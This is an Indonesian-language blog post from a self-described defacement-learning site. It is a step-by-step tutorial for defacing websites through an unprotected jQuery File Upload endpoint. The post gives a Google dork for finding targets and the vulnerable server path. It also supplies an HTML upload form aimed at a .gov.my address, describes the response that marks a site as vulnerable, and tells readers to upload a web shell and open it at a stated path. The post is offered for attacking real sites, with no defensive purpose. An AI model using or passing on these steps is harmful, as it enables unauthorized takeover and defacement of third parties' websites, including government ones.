Tutorial Deface : [Update] Tutorial Deface Dengan Jquery File Upload full Tutorial 2017 - Defa Squad

Defa Squad

Tempat Belajar Deface

Post Top Ad

Saturday, June 17, 2017

Home Tutorial Deface Tutorial Deface : [Update] Tutorial Deface Dengan Jquery File Upload full Tutorial 2017

Tutorial Deface : [Update] Tutorial Deface Dengan Jquery File Upload full Tutorial 2017

Okee kali ini saya akan share tutorial Deface Method Jquery File File Upload

Alat Alat :

  • Default Google Dork :/assets/global/plugins/jquery-file-upload/ site:        *Kembangin lagi biar joss
  • Exploit: http://targetcrotz.com/assets/global/plugins/jquery-file-upload/server/php/ atau http://target/[patch]/assets/global/plugins/jquery-file-upload/server/php/
  • Script CSRF: Save dengan .html
<form method="POST" action="http://target.gov.my/public/templates/skin/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</

  •  Shell : Pakek shell andalan kalian.. 
Langkah langkah:


  • Masukan dork di atas atau dork yang sudah ente kembangin,pilih target lalu masukan exploitnya,jika vuln maka ada tulisan seperti ini: {"files":[{}] Atau {"files":[{blablablablba}]
  • Masukan target anda ke script CSRF tadi
  • Upload shell anda jika berhasil ada tampilan seperti ini:

  • Akses shell ada di : http://targetcrotz.gov.my/assets/gobal/plugins/jquery-file-upload/server/php/files/namashellmu.php
Nih uploadanya yang saya tester tadi  :
Okee Sekian dari saya , semoga bermanfaat.. Terimakasih..
Tags
Author Image

About Unknown

at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Post Top Ad

Author Details